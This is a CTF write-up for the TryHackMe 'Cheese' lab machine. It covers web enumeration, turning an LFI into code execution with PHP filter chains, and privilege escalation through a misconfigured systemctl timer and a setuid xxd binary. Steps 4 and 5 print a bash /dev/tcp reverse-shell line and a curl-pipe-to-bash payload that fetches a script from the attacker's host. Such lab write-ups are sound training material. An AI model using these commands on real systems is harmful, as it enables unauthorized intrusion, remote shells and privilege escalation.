TryHackme: Cheese CTF Write-ups
Problems :-
1. Find the user.txt flag
2. Find the root.txt flag
Solutions :-
Step1 :-
Enumeration the System or Machine, using most common tool 'nmap' .
What the f’’’’k, If all ports are open, it might be set up as a honeypot.
That's why I should try another approach.
Step2 :-
address and paste it into your browser.
The website is based on 'Cheese.' Let’s enumerate this website.
1. Fuzzing the Web dict. using dirbserch tools
There’s nothing particularly special to find any hint. Check the
'images' directory.
Here are some images, but there are no other files. The web server is
running Apache 2.4.41. Check if any exploits are available.
But you can see that there is a login.php path. Let's check this path
for find SQL vulnerabilities. However, I didn’t find any SQL
vulnerabilities. By the way, I am using an automated tool called
'sqlmap,' which is not a good practice. You should perform the
check manually.
Step 3 :-
At this moment, I am trying to find some common files or
directories, such as: robots.txt, wp-config.php, messages.html, cgi-
bin, etc. However, in the 'messages.html' path, I found something
special.
The URL shows an LFI vulnerability with PHP filters. I am trying to
exploit the LFI to RCE via PHP filters. Let’s go!
Try ‘/etc/passwd’ , it’s work.
Step 4 :-
The subsequent step involved utilizing this information to
achieve remote code execution (RCE). Through thorough research, I
discovered a Python script available on online designed to generate
a PHP filter payload. This payload enables us to exploit the Local
File Inclusion (LFI) vulnerability, facilitating the execution of
arbitrary commands on the server. The relevant link is provided
below:
‘https://github.com/synacktiv/php_filter_chain_generator.git’
Then, write a simple rev-shell script and save it.
Run the python server, after execute the payload.
Rev-shell: ‘bash -i >& /dev/tcp/10.X.X.X/4444 0>&1’
Run the following commands [
python3 php_filter_chain_generator.py --chain '<?= `curl -s -L
10.X.X.X/fname.sh|bash` ?>'
And we get the payloads.
Set the netcat listener.
Step 5 :-
Inject the payload into the vulnerable URL path. Ensure that the
Netcat listener is already active and awaiting for a connection.
Woww, we get the shell .
Quickly switch to a Python 'pty' shell. Execute the following
command to stabilize the session.
[python3 -c ‘import pty;pty.spawn(“/bin/sh”)’]
Step 6 :-
Let's try to read the user flag at '/home/comte/user.txt'. But
permission is denied because we are not the user 'comte'.
Look for anything unusual. I found a '.ssh' directory.
You can write or paste an SSH key into the 'authorized_keys' file to
gain SSH access as the 'comte' user.
Create a ssh key , Run the following commands
[
sudo ssh-keygen -t rsa
]
Save it in any location.
Step 7 :-
After generating an SSH key and adding it to the authorized keys
file, log in as the comte user. Run following this command.
[
ssh comte@ip -i id_rsa
]
Wow! Now we have access as the 'comte' user. Let's read this user
flag.
Step 8 :-
Let’s get root access of this machine ,
1. check ‘sudo -l’
I
found a vulnerable binary that allows me to execute systemctl
and
modify a file called exploit.timer,
which is used to run an exploit
service.
The
exploit.timer
file contained a misconfiguration; however, due
to my write access, I was able to rectify the settings. I configured the
timer to execute every 5seconds or++ and subsequently initiated the
service.
After that, Run the following binary .
[
sudo /bin/systemctl daemon-reload
sudo /bin/systemctl restart exploit.timer
sudo /bin/systemctl start exploit.timer
systemctl status exploit.timer
]
The
service would invoke exploit.service,
which granted setuid
permissions to the xxd
binary, enabling it to execute with elevated
privileges.
Let’s got the ‘’https://gtfobins.github.io/gtfobins/xxd/’’ how to use
of xxd to get privileges.
Run the following command to read the root flag.
[
1.Go to the ‘/opt’ path
2. /opt/xxd “/root/root.txt” | xxd -r
]
And we get the final flag.
Thank you everyone.
0 Comments